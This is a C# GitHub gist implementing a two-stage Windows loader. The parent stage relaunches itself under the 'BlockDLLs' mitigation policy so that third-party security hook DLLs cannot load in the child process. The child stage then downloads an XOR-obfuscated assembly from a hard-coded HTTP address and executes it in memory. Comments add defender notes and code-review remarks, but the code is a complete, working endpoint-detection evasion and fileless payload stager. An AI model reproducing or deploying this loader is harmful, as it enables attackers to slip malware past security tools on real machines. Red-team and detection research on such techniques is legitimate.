@mvelazc0
Last active October 12, 2020 23:45
Uses the BlockDLLs technique to execute https://gist.github.com/mvelazc0/4a56e1829ef3bd2784b6f06e35cb0ff2 as a child process.
using System;
using System.IO;
using System.Net;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Text;
namespace GetAndRunBlockDlls
{
/// <summary>
/// Two-stage loader that branches purely on the number of command-line arguments.
/// With no arguments (parent stage) it re-launches its own executable as a child process whose
/// PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY is set to BLOCK_NON_MICROSOFT_BINARIES_ALLOW_STORE, so the
/// child process may only load Microsoft- or Store-signed DLLs (the "BlockDLLs" technique, whose practical
/// effect is to keep third-party user-mode hook DLLs out of the child). With exactly one argument (child
/// stage) it fetches a base64 blob over plain HTTP, XOR-decodes it and runs it via Assembly.Load.
/// Defender notes grounded in this code: parent and child share the same image path and the child is
/// created with ExtendedStartupInfoPresent plus a mitigation-policy attribute; the child then makes an
/// outbound HTTP request and performs an in-memory Assembly.Load from a byte[] (no assembly file on disk,
/// but the CLR still raises its normal assembly-load events). The XOR "key" is a single ASCII byte, so the
/// transport encoding is obfuscation rather than encryption.
/// </summary>
class Program
{
/// <summary>
/// Entry point. args.Length == 0 selects the parent stage, args.Length == 1 the child stage
/// (the parent passes " /v", so the child sees one argument); any other count does nothing.
/// None of the Win32 return values below are checked and no unmanaged allocation or handle is released.
/// </summary>
static void Main(string[] args)
{
if (args.Length == 0)
{
var startInfoEx = new Win32API.STARTUPINFOEX();
var processInfo = new Win32API.PROCESS_INFORMATION();
// cb must be the size of the extended struct, not of STARTUPINFO, when ExtendedStartupInfoPresent is used.
startInfoEx.StartupInfo.cb = (uint)Marshal.SizeOf(startInfoEx);
// Unmanaged cell that will hold the 64-bit mitigation-policy value (sized IntPtr.Size, i.e. 8 on x64).
// Never freed.
var lpValue = Marshal.AllocHGlobal(IntPtr.Size);
var processSecurity = new Win32API.SECURITY_ATTRIBUTES();
var threadSecurity = new Win32API.SECURITY_ATTRIBUTES();
processSecurity.nLength = Marshal.SizeOf(processSecurity);
threadSecurity.nLength = Marshal.SizeOf(threadSecurity);
var lpSize = IntPtr.Zero;
// First call with a null list is the documented size query; it is expected to return FALSE
// (ERROR_INSUFFICIENT_BUFFER) and only fill lpSize. Two attribute slots are requested but only one is used.
Win32API.InitializeProcThreadAttributeList(IntPtr.Zero, 2, 0, ref lpSize);
// Attribute list is allocated here and never released (DeleteProcThreadAttributeList is declared in
// Win32API but never called).
startInfoEx.lpAttributeList = Marshal.AllocHGlobal(lpSize);
Win32API.InitializeProcThreadAttributeList(startInfoEx.lpAttributeList, 2, 0, ref lpSize);
// Policy value 0x300000000000 lives in the upper DWORD of the 64-bit mitigation policy.
// NOTE(review): new IntPtr(long) throws OverflowException in a 32-bit process for this value,
// so this path is effectively x64-only.
Marshal.WriteIntPtr(lpValue, new IntPtr((long)Win32API.BinarySignaturePolicy.BLOCK_NON_MICROSOFT_BINARIES_ALLOW_STORE));
// Attach the mitigation policy to the attribute list; cbSize is IntPtr.Size (8 on x64).
Win32API.UpdateProcThreadAttribute(
startInfoEx.lpAttributeList,
0,
(IntPtr)Win32API.ProcThreadAttribute.MITIGATION_POLICY,
lpValue,
(IntPtr)IntPtr.Size,
IntPtr.Zero,
IntPtr.Zero
);
// Spawn this same executable with a single extra argument so the child takes the args.Length == 1 branch.
// Handles are not inherited; the returned process/thread handles in processInfo are never closed.
Win32API.CreateProcess(
System.Reflection.Assembly.GetEntryAssembly().Location,
System.Reflection.Assembly.GetEntryAssembly().Location + " /v",
ref processSecurity,
ref threadSecurity,
false,
//Win32API.CreationFlags.ExtendedStartupInfoPresent | Win32API.CreationFlags.CreateSuspended,
Win32API.CreationFlags.ExtendedStartupInfoPresent,
IntPtr.Zero,
null,
ref startInfoEx,
out processInfo
);
}
else if (args.Length == 1)
{
// Hard-coded plaintext HTTP origin on a private-range address and a one-byte XOR key.
string server = "http://192.168.0.91:8000/payload";
string key = "A";
// WebClient, Stream and StreamReader are never disposed.
WebClient client = new WebClient();
Stream stream = client.OpenRead(server);
StreamReader reader = new StreamReader(stream);
// Response body is base64 text of the XOR-encoded assembly.
byte[] code = Convert.FromBase64String(reader.ReadToEnd());
byte[] assemblyBytes = xor(code, Encoding.ASCII.GetBytes(key));
// In-memory load into the current AppDomain; no file is written to disk.
Assembly assembly = Assembly.Load(assemblyBytes);
// Expects a type "Namespace.Class" with a callable "Run" member; GetType returns null otherwise and
// Activator.CreateInstance(null) then throws ArgumentNullException.
Type type = assembly.GetType("Namespace.Class");
object obj = Activator.CreateInstance(type);
type.InvokeMember("Run",
BindingFlags.Default | BindingFlags.InvokeMethod,
null,
obj,
new object[] { });
}
}
/// <summary>
/// Repeating-key XOR: byte i of the result is cipher[i] ^ key[i % key.Length]. The operation is its own
/// inverse, so this both "encodes" and "decodes". Returns a new array; the input is not modified.
/// Throws DivideByZeroException when key is empty and cipher is not.
/// </summary>
private static byte[] xor(byte[] cipher, byte[] key)
{
byte[] xored = new byte[cipher.Length];
for (int i = 0; i < cipher.Length; i++)
{
xored[i] = (byte)(cipher[i] ^ key[i % key.Length]);
}
return xored;
}
}
/// <summary>
/// kernel32 P/Invoke declarations and sequential-layout structs used by <see cref="Program"/> to create a
/// child process with a PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY attribute. All structs are blittable and
/// laid out to match the native Win32 definitions; only the field names differ in places.
/// </summary>
class Win32API
{
/// <summary>
/// Sizes (when lpAttributeList is null) or initializes a PROC_THREAD_ATTRIBUTE_LIST for dwAttributeCount
/// attributes. The size-query call returns false by design; callers should check GetLastWin32Error for
/// ERROR_INSUFFICIENT_BUFFER rather than treating false as failure.
/// </summary>
[DllImport("kernel32.dll", SetLastError = true)]
public static extern bool InitializeProcThreadAttributeList(IntPtr lpAttributeList, int dwAttributeCount, int dwFlags, ref IntPtr lpSize);
/// <summary>
/// Stores one attribute (here a <see cref="ProcThreadAttribute"/> value cast to IntPtr) in an initialized
/// attribute list. lpValue must point at cbSize bytes that stay valid until the list is deleted.
/// </summary>
[DllImport("kernel32.dll", SetLastError = true)]
public static extern bool UpdateProcThreadAttribute(IntPtr lpAttributeList, uint dwFlags, IntPtr Attribute, IntPtr lpValue, IntPtr cbSize, IntPtr lpPreviousValue, IntPtr lpReturnSize);
/// <summary>
/// CreateProcess with an extended STARTUPINFOEX. No CharSet is given, so the string parameters marshal
/// as ANSI (binds to CreateProcessA), and SetLastError is not set, so Marshal.GetLastWin32Error() is not
/// reliable after a failed call. The caller owns the two handles returned in lpProcessInformation.
/// </summary>
[DllImport("kernel32.dll")]
public static extern bool CreateProcess(string lpApplicationName, string lpCommandLine, ref SECURITY_ATTRIBUTES lpProcessAttributes, ref SECURITY_ATTRIBUTES lpThreadAttributes, bool bInheritHandles, CreationFlags dwCreationFlags, IntPtr lpEnvironment, string lpCurrentDirectory, [In] ref STARTUPINFOEX lpStartupInfo, out PROCESS_INFORMATION lpProcessInformation);
/// <summary>
/// Releases the attribute list's internal state (the HGlobal buffer still has to be freed separately).
/// Declared here but not called anywhere in this file.
/// </summary>
[DllImport("kernel32.dll", SetLastError = true)]
public static extern bool DeleteProcThreadAttributeList(IntPtr lpAttributeList);
/// <summary>Native PROCESS_INFORMATION: two handles (must be closed by the caller) and two DWORD ids.</summary>
[StructLayout(LayoutKind.Sequential)]
public struct PROCESS_INFORMATION
{
public IntPtr hProcess;
public IntPtr hThread;
public int dwProcessId;
public int dwThreadId;
}
/// <summary>
/// Native STARTUPINFO. Field order and widths match the Win32 layout (DWORD cb, three LPSTR, eight DWORD,
/// two WORD, one LPBYTE, three HANDLE); <c>cbReserved</c> and <c>hStdErr</c> are the native
/// <c>cbReserved2</c> and <c>hStdError</c> under different names.
/// </summary>
[StructLayout(LayoutKind.Sequential)]
public struct STARTUPINFO
{
public uint cb;
public IntPtr lpReserved;
public IntPtr lpDesktop;
public IntPtr lpTitle;
public uint dwX;
public uint dwY;
public uint dwXSize;
public uint dwYSize;
public uint dwXCountChars;
public uint dwYCountChars;
public uint dwFillAttributes;
public uint dwFlags;
public ushort wShowWindow;
public ushort cbReserved;
public IntPtr lpReserved2;
public IntPtr hStdInput;
public IntPtr hStdOutput;
public IntPtr hStdErr;
}
/// <summary>
/// Native STARTUPINFOEX: STARTUPINFO followed by the attribute-list pointer. StartupInfo.cb must hold
/// sizeof(STARTUPINFOEX) when passed with <see cref="CreationFlags.ExtendedStartupInfoPresent"/>.
/// </summary>
[StructLayout(LayoutKind.Sequential)]
public struct STARTUPINFOEX
{
public STARTUPINFO StartupInfo;
public IntPtr lpAttributeList;
}
/// <summary>Native SECURITY_ATTRIBUTES; bInheritHandle is a Win32 BOOL, hence int.</summary>
[StructLayout(LayoutKind.Sequential)]
public struct SECURITY_ATTRIBUTES
{
public int nLength;
public IntPtr lpSecurityDescriptor;
public int bInheritHandle;
}
/// <summary>
/// PROC_THREAD_ATTRIBUTE_* identifiers passed to UpdateProcThreadAttribute. These are distinct attribute
/// numbers, not combinable bits, so the [Flags] attribute is misleading here.
/// </summary>
[Flags]
public enum ProcThreadAttribute : int
{
MITIGATION_POLICY = 0x20007,
PARENT_PROCESS = 0x00020000
}
/// <summary>
/// PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_* values. They occupy the upper DWORD
/// of the 64-bit mitigation policy, which is why the enum is ulong. ALWAYS_ON restricts the child to
/// Microsoft-signed DLLs; ALLOW_STORE additionally permits Microsoft Store-signed DLLs.
/// </summary>
[Flags]
public enum BinarySignaturePolicy : ulong
{
BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON = 0x100000000000,
BLOCK_NON_MICROSOFT_BINARIES_ALLOW_STORE = 0x300000000000
}
/// <summary>
/// Subset of the CREATE_* dwCreationFlags for CreateProcess. ExtendedStartupInfoPresent tells the API that
/// lpStartupInfo is a STARTUPINFOEX carrying an attribute list.
/// </summary>
[Flags]
public enum CreationFlags : uint
{
CreateSuspended = 0x00000004,
DetachedProcess = 0x00000008,
CreateNoWindow = 0x08000000,
ExtendedStartupInfoPresent = 0x00080000
}
}
}